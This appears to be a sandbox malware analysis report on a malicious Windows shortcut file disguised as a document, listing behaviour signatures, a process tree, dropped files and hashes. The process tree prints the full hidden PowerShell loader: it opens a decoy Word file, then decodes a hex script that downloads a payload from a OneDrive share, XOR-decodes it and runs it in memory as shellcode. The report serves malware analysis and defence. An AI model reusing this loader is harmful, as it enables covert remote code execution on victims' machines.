Resubmissions

15/05/2023, 08:56

230515-kv1yvahh6x 8

26/04/2022, 12:32

220426-pq1jqsgcgn 8

Analysis

  • max time kernel
    149s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    15/05/2023, 08:56

General

  • Target

    Kang Min-chol Edits 2.lnk

  • Size

    269.6MB

  • MD5

    99fb399c9b121ef6e60e9bdff8b324b2

  • SHA1

    ea0609fbf3bf0cfb2acea989126d8caafe5350ec

  • SHA256

    120ca851663ef0ebef585d716c9e2ba67bd4870865160fec3b853156be1159c5

  • SHA512

    5f44ea1d7ad196c9f54371f7a176da2a0be0499b4acac3f2ac3bd99a517f045e086ae066d2fa7239f23ece2ea2cf115c2ecd8bdc973200fea78b6f0ca39c3a6f

  • SSDEEP

    6144:BGuqgL6dMo3LzAxwPezulhJmHkYnPs/Zx5+3tg1pQZJo3b8VihA/wwH88xinXHdk:BGzitxwPX/5hOor8VihA/wwc8xiXHkV

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 12 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 48 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Kang Min-chol Edits 2.lnk"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1260
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\SysWOW64\cmd.exe" /c powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk ^| where-object {$_.length -eq 0x0010D98A06} ^| Select-Object -ExpandProperty FullName; $pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00547552 -ReadCount 00547552; $pdfPath = 'C:\Users\Admin\AppData\Local\Temp\Kang Min-chol Edits 2.doc'; sc $pdfPath ([byte[]]($pdfFile ^| select -Skip 009440)) -Encoding Byte; ^& $pdfPath; $won11 ="$temple="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F6170692E6F6E6564726976652E636F6D2F76312E302F7368617265732F75216148523063484D364C7938785A484A324C6D317A4C33557663794642636A6C365A6E4A336546645852573968637A565961566335545755784E476C68516E4D5F5A5430775A5664446354632F726F6F742F636F6E74656E74223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$martin="""""";for($i=0;$i -le $temple.Length-2;$i=$i+2){$Sorre=$temple[$i]+$temple[$i+1];$martin= $martin+[char]([convert]::toint16($Sorre,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($martin));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($won11));
      2⤵
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of WriteProcessMemory
      PID:1772
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0010D98A06} | Select-Object -ExpandProperty FullName; $pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00547552 -ReadCount 00547552; $pdfPath = 'C:\Users\Admin\AppData\Local\Temp\Kang Min-chol Edits 2.doc'; sc $pdfPath ([byte[]]($pdfFile | select -Skip 009440)) -Encoding Byte; & $pdfPath; $won11 ="$temple="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F6170692E6F6E6564726976652E636F6D2F76312E302F7368617265732F75216148523063484D364C7938785A484A324C6D317A4C33557663794642636A6C365A6E4A336546645852573968637A565961566335545755784E476C68516E4D5F5A5430775A5664446354632F726F6F742F636F6E74656E74223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$martin="""""";for($i=0;$i -le $temple.Length-2;$i=$i+2){$Sorre=$temple[$i]+$temple[$i+1];$martin= $martin+[char]([convert]::toint16($Sorre,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($martin));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($won11));
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1396
        • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
          "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Kang Min-chol Edits 2.doc"
          4⤵
          • Drops file in Windows directory
          • Modifies Internet Explorer settings
          • Modifies registry class
          • Suspicious behavior: AddClipboardFormatListener
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:1008
          • C:\Windows\splwow64.exe
            C:\Windows\splwow64.exe 12288
            5⤵
              PID:1660
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
            "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iuz9qdy7.cmdline"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1828
            • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
              C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES604B.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC604A.tmp"
              5⤵
                PID:1580
            • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
              "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mzwairbj.cmdline"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1688
              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES60E7.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC60E6.tmp"
                5⤵
                  PID:612
              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
                "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ixb2gehj.cmdline"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:1892
                • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES62BB.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC62BA.tmp"
                  5⤵
                    PID:2000
                • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
                  "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5q7zecwr.cmdline"
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1980
                  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6318.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC6317.tmp"
                    5⤵
                      PID:1736

            Network

            MITRE ATT&CK Enterprise v6

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

              Filesize

              62KB

              MD5

              3ac860860707baaf32469fa7cc7c0192

              SHA1

              c33c2acdaba0e6fa41fd2f00f186804722477639

              SHA256

              d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904

              SHA512

              d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

            • C:\Users\Admin\AppData\Local\Temp\5q7zecwr.dll

              Filesize

              3KB

              MD5

              e584b613345feb87b4d80b887887d8c0

              SHA1

              c6e65f073034ce0f648ab216d2c75cbb1ebe0b20

              SHA256

              8a8faee3caf5fcb6df32ccfff77f2cc3e220ee8df5651e784d4089742d9325bd

              SHA512

              1fecbe6f3974d6b68b25f7a4639fe09f86ee59c0dfd2062af8e665b901f6a649dac242531364ac0e329cc169c90dbcbb8567c2fe0533dfe432084915679eceea

            • C:\Users\Admin\AppData\Local\Temp\5q7zecwr.pdb

              Filesize

              7KB

              MD5

              5a4d97d251a0bf9efe0711b55436ddc5

              SHA1

              f09758223f43981422698eb516b84def522a6747

              SHA256

              a35ca30f5344ee4d8a7f4484fe7a6dd191c1d2d8f07a0884a6351cff38e724a6

              SHA512

              c281e0cc9811a10ee505896613445a47b5b6eda1610bc5eb4b7be67e6f7933270c268c92625d5e392b182761449b88157155aff9803f52cfa4f88e20303927ee

            • C:\Users\Admin\AppData\Local\Temp\Kang Min-chol Edits 2.doc

              Filesize

              525KB

              MD5

              3f209fa947acfa93d67d40de9fa32fb2

              SHA1

              68c3974f4e089736e4263e4368daa53e419471bc

              SHA256

              94ca32c0a3002574d7ea1bef094146a9d3b2ad0018b3e3d3f4ffca8689b89e5a

              SHA512

              0b30c69ed47817e8c6890b5d83011020fbc919b9fb52de116c4920b84cfa2c667e855ca30afc78e99ecc1ad4990cc681d05c7c933c0c91489932b03d62d23ca8

            • C:\Users\Admin\AppData\Local\Temp\RES604B.tmp

              Filesize

              1KB

              MD5

              98b1dc707a6ce05004449da3242b509c

              SHA1

              077df96e930bed76759239cf80cff2180c4023bc

              SHA256

              f5f2fe5dea958480aec5763c1358b22f4aad0213b01a1e0e7a59ce75d82810a8

              SHA512

              62376a6acbf568bbf72fa2dec4013fe2eebc90b444c51b835ec491a9478149f1b045ab1898cde38e96138c29fd71e38507bebc7e6918ef5bc1689ea0558dbc0a

            • C:\Users\Admin\AppData\Local\Temp\RES60E7.tmp

              Filesize

              1KB

              MD5

              488f30123b11f861894b2e6b17561674

              SHA1

              82988b30e6bd0eb4b1880b8885890b479aed0170

              SHA256

              d60b51fbefa0f011b7b3c283dea99148c4c5fac6cf9e60900a3d0166466bba56

              SHA512

              d48196ba6efcb078b829b89e6d6cc648fdab0bfbadae513425486bb016cc0efe1829889226815fe5ef2e76a870c15aff5403378dea682005493bec68f446fac3

            • C:\Users\Admin\AppData\Local\Temp\RES62BB.tmp

              Filesize

              1KB

              MD5

              306bde74e5d9226be5eb9518168fe8c2

              SHA1

              a75aa831583949ff32f51482680e455fb959b62c

              SHA256

              8bff58b9342e417dbbacd4eb072b6437d5bf970bd08cefeac5b1d0ba4d4da490

              SHA512

              fa8d0d7c1de334fa0d9345823bb74ee49ac58ecb375d4542ef8b697943c740b4526835dfa337b0ad4bbbb15160d16b5de53076365b6163780bd42e246771a425

            • C:\Users\Admin\AppData\Local\Temp\RES6318.tmp

              Filesize

              1KB

              MD5

              29125c4ba1eaea9a81bb74939eaf9870

              SHA1

              1b6102b1f4f13115c028598880d2c91f1c7dd2f6

              SHA256

              fb440d5eb6c8f66ca15c8be511c835acb251d72f051a9a8e33b92062c95964fe

              SHA512

              a2d4b664abdcc551ef87c36e77607f09ef6fa8d9163d41fab22338f0373553601816205659458585e315d73773c43c7c99ac4da7dd6c68cd8fd93efcf6ac0aa2

            • C:\Users\Admin\AppData\Local\Temp\Tar7E0E.tmp

              Filesize

              164KB

              MD5

              4ff65ad929cd9a367680e0e5b1c08166

              SHA1

              c0af0d4396bd1f15c45f39d3b849ba444233b3a2

              SHA256

              c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6

              SHA512

              f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27

            • C:\Users\Admin\AppData\Local\Temp\iuz9qdy7.dll

              Filesize

              3KB

              MD5

              048c5299e31395f8ffb36d6cdfad26ce

              SHA1

              c6323dc7f69c5627765899c5d963ef5818c99bbf

              SHA256

              1f1e3d1443dcc216bc2c654fd2255573da9f769ada5ce9e8ca8505e739cec41a

              SHA512

              24784d0a34e3d07d9d023d1c82e1ee3f301ee1b789dba9928eb8e8cc457087c863740a736afb4d0da323b3930a4936092d158831cb565e3837d1bc5f47c500b3

            • C:\Users\Admin\AppData\Local\Temp\iuz9qdy7.pdb

              Filesize

              7KB

              MD5

              d1add77bd314680318e4ea1212e4c78f

              SHA1

              4dbe442fa8e153bb9f83890991d2bcba99e50550

              SHA256

              3a4875680026d99579b4f111939f07dc635cd49b4348f13d0e8643fa6b0291b5

              SHA512

              915ddb35b701ce1031b5bdc5f176367924baf11f04051f9ecfb0053649666fd19b8cdf12377a11194a73dfc4fc72c6eb4b4353358eecf97e13e57c94e96ac582

            • C:\Users\Admin\AppData\Local\Temp\ixb2gehj.dll

              Filesize

              3KB

              MD5

              d57af0d975f389195bd9cfe4ec43a8eb

              SHA1

              7966614ef17ce679d3add8369d874afcf36ea065

              SHA256

              4e89511ce8207e870232299c2aa82aad4b9224202de29d0e44a16495a3e2660a

              SHA512

              fcb620b2f05776cb592819d2ab25567c2949a3029124f9bc7008215e78109d6ccdb094b6372b8ae5835d0f5578455a222b23bd19adcee702e6dcf66a8b06e1e4

            • C:\Users\Admin\AppData\Local\Temp\ixb2gehj.pdb

              Filesize

              7KB

              MD5

              db3ad2352047ed7567713a812a829de1

              SHA1

              d21461daed26cd95cee4c03777fcd3432ae32c8e

              SHA256

              dc1892774c98e44a1295413d516a7baf0bffe8f26fc72150e7528a2747e3b722

              SHA512

              ff9830267c3cc57d54db16f38f5f7d399828e01cc72b2c956fb9894633227d6f849dec424c4cbf8e28debadff5aba377e7085d2648f9662c65448f3326487c0b

            • C:\Users\Admin\AppData\Local\Temp\mzwairbj.dll

              Filesize

              3KB

              MD5

              f2d3692bcaa7250a3c5606ea26fc3e3a

              SHA1

              75a63d23d6721511a9e9956a7d7415533fc58a22

              SHA256

              3010c07834669bce8de3ed7d40cf41397992eb07cad4c907225255f208fc3b6c

              SHA512

              2d5af1ed6291144c62c04c7bdd9610bc7e8ce6dbae6664cfd76cd83523f171ca5a4a5533b41ab0fd142c0e42ecd1188fa9dee4be7992a3e9dbce10a62fd285c4

            • C:\Users\Admin\AppData\Local\Temp\mzwairbj.pdb

              Filesize

              7KB

              MD5

              ff41326f1965b95be195badbee925566

              SHA1

              80537e588194bb318022d6acea4514a49fc8afa0

              SHA256

              32d7e836fc857b4751361fca55cff03841c18e6ce05d7f44facfc93c035ceb79

              SHA512

              314d0a830158c2a031217721e9a494efc4c4f0aa0e0bb93b7225291110bbd4edd8aa7727d1a58851d702a8d912eb29ff234ac565538c1df564e461ebe0461163

            • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

              Filesize

              20KB

              MD5

              18c456f4731091b2d12c69838d801e21

              SHA1

              a7b4518e6b1197d75225dcf91aaf00268347a1f5

              SHA256

              3af8d6b870a02afa2d218eb751a2ab033e148b77d13ad88d1a8923fe17eb4b66

              SHA512

              afb74029825fac3310e2d719eb1d2e2ed45f52707749abbe3ce77ce4511da717ce062a5ef4e553a71d0face49c2f4cc9282b8319debe901db5703d2c6f3ed24d

            • C:\Users\Admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

              Filesize

              2B

              MD5

              f3b25701fe362ec84616a93a45ce9998

              SHA1

              d62636d8caec13f04e28442a0a6fa1afeb024bbb

              SHA256

              b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

              SHA512

              98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

            • \??\c:\Users\Admin\AppData\Local\Temp\5q7zecwr.0.cs

              Filesize

              259B

              MD5

              560e1b883a997afcfa3b73d8a5cddbc1

              SHA1

              2905f3f296ac3c7d6a020fb61f0819dbea2f1569

              SHA256

              e5231270257f1727ca127b669a7c21d46ced81cd5b46e89c48dd8304c1185bea

              SHA512

              041dd231b93708d4ad65580ea0fa7cff34a9a43ff8d3ae45b631a381e01dc286607aec05b1aade537818d068ca0b576cac613fde626d60eb2e4e6c3c0f525635

            • \??\c:\Users\Admin\AppData\Local\Temp\5q7zecwr.cmdline

              Filesize

              309B

              MD5

              0ebed22198ce4939c3cc710bc93ae8a4

              SHA1

              9337334616687a3b3d22e2ccc0936dc993f1a766

              SHA256

              ce0193a18d58f4733aefa2c369027083fd67bcb4b1ab236b7e75168c296f7d45

              SHA512

              d1c6a75a9afe651e2f23865c4d8618cbdcb3dbd114d805607aa16ac87345b8d6ed177ac18d5cd82fa5beae2c108931e7f5c36ae420a34f81ef8242e81c7e295a

            • \??\c:\Users\Admin\AppData\Local\Temp\CSC604A.tmp

              Filesize

              652B

              MD5

              41a578d55538e68ce41b66b183d18f66

              SHA1

              e7aa9d20118ddfd9d0341e05a588410872135d69

              SHA256

              44a647639ce0414ec66ea7e83aa9c3e1849bc68425aa4fdc04bbe07afff98c04

              SHA512

              3eef9671171d0d95b49b548891ed2356968395a9f25815020820b10be356d575c5b77fa729719f51c594771de9a37dbc462a1aae1a0afa98bf1281d50a55b479

            • \??\c:\Users\Admin\AppData\Local\Temp\CSC60E6.tmp

              Filesize

              652B

              MD5

              9e500ba6daeca4310c8a06aafb5029b0

              SHA1

              22cf588b5a5dab266e3b01c5f3263bdf2855cf3d

              SHA256

              1a4db48fa18cfbc4afe4746578715cc7b9ffa7eb91903a8beb054027cbcdbc0c

              SHA512

              cac6895462424fbd3dc79467723bb440dcb9697bba5e1adb6d8e36760add2d120121bee32d6dcc9e629a2e7fdb2282ab3e1e684df52a3ef99f74a0c531a114dc

            • \??\c:\Users\Admin\AppData\Local\Temp\CSC62BA.tmp

              Filesize

              652B

              MD5

              517c156e00034b6266225a49793e9d81

              SHA1

              3f41b6820d2e34401dac315c668df9c1dbcdc77b

              SHA256

              0624fe93315e436d70781f5514e424e446b9a6b9fd4a157f53cb52e8fdf6dffe

              SHA512

              60a2931d0f40a4d04cf5028f8afeddea1755d9853c09dd8c060d3281e9016e2e66b9cc97b89c70aa5d6d05bedb595381be20b2072df02e7d5b33fd3c882df00e

            • \??\c:\Users\Admin\AppData\Local\Temp\CSC6317.tmp

              Filesize

              652B

              MD5

              eba5fd422926789f461cba80ed59f4ec

              SHA1

              eb4bb7b3b07a978b07e69add2fae46e7215f85e5

              SHA256

              2d0201a970c588dbe801faf26271bbae80c8bcd2b62864223610874bb0a6f1be

              SHA512

              e9b4d10db84e2d1fa93f4c2d07470b795acaaeb40b44cf1ae29dfc63224b28303f86755a2ce6eacd4a9e9793dfdca5756ffeaf76e342a16b673060da58b007ca

            • \??\c:\Users\Admin\AppData\Local\Temp\iuz9qdy7.0.cs

              Filesize

              249B

              MD5

              69ecfeb3e9a8fb7890d114ec056ffd6d

              SHA1

              cba5334d2ffe24c60ef793a3f6a7f08067a913db

              SHA256

              0a913fd594ad2da3159400fc3d7d2cc50b34f8f31675ec5ac5a41d7e79e9fd58

              SHA512

              be7eb5a6a8bcc7f279aee00ad650aa872fc7fc08227eedeb9cc0a4273f0382b91306f60878728eaba3c79fa8c96066b144ecea897360a11be38996f04fdd99e1

            • \??\c:\Users\Admin\AppData\Local\Temp\iuz9qdy7.cmdline

              Filesize

              309B

              MD5

              7df77dff1312544cd0a362b2eb939168

              SHA1

              2db8e640400c0a778fcdaf276fc859a9ab58e5c1

              SHA256

              31c41f540f0cf05c755e54135d4f47f7c8b81770e4f4c2e5e4faa249b1c09cdd

              SHA512

              17bb17923d6992f60e2a56f86a9ff68654912bc47b3aa3c1e2efe2d99c48999e71e00acdc544f5bbd46914d0f70cc2bb7ead425315e3337bfb28da4fc1e54445

            • \??\c:\Users\Admin\AppData\Local\Temp\ixb2gehj.0.cs

              Filesize

              286B

              MD5

              b23df8158ffd79f95b9bddd18738270b

              SHA1

              79e81bb74bc53671aeabecae224f0f9fe0e3ed7f

              SHA256

              856bded4416dd1595613354334ad1d3e5c4922a86102786429bcdb0e7f798882

              SHA512

              e23822d5b9a32d7fc705b772ef43bcb336e201ec9c1d2507a530e8b1b383b0727c0b53b92e881a953527e7b2ffb485e24c1161834c9380d1bb7498eac7e4a67f

            • \??\c:\Users\Admin\AppData\Local\Temp\ixb2gehj.cmdline

              Filesize

              309B

              MD5

              21c3730152b28eeca74673e9aa945fc6

              SHA1

              027e44c449dcf5d68344d22675fbd0d144f4d6b3

              SHA256

              f881ce03c0c6362c4be7cf2c11d212beccdca270edd8771e30071080bd01dfd6

              SHA512

              ed977faffd15b25d4f51d04a8838b4c609621a0e2f25ae6b08fa8d41543b0d02ca747c46dccf2cdf8c1e6dbf00e6e2338c59e3c80944cd9c996c77fc274512af

            • \??\c:\Users\Admin\AppData\Local\Temp\mzwairbj.0.cs

              Filesize

              272B

              MD5

              4de985ae7f625fc7a2ff3ace5a46e3c6

              SHA1

              935986466ba0b620860f36bf08f08721827771cb

              SHA256

              53d5aecb149a00bc9c4fac5feb8e5feddf5c83986c12d5fef1c3ddd104b09004

              SHA512

              067916a8d16d322d72901baf3a369be43c99780961ccd306c171bf7ded06e3a13cf69c7fa0cd26c7fa181d87fc0e870f86d274098854a56346ca9272c0b99393

            • \??\c:\Users\Admin\AppData\Local\Temp\mzwairbj.cmdline

              Filesize

              309B

              MD5

              2773272221853de236fd203963b93873

              SHA1

              c3b90d8c50b901b7fda90846c43e54d20d8476aa

              SHA256

              19a340f3d6dc018c513fcf93c031d04d7689b6eced45f868381cee8feb06f2b8

              SHA512

              5f6c1d57f10764244de8c25be750710aad51fce6be941eb760079ea7b0a73a3335c960ed61a24a28979497e486aadfcaeddf30c2e3cfbdad8fbb5f578a73292d

            • memory/1008-107-0x000000005FFF0000-0x0000000060000000-memory.dmp

              Filesize

              64KB

            • memory/1008-670-0x000000005FFF0000-0x0000000060000000-memory.dmp

              Filesize

              64KB

            • memory/1396-92-0x0000000002380000-0x00000000023C0000-memory.dmp

              Filesize

              256KB

            • memory/1396-159-0x0000000002380000-0x00000000023C0000-memory.dmp

              Filesize

              256KB

            • memory/1396-93-0x0000000002380000-0x00000000023C0000-memory.dmp

              Filesize

              256KB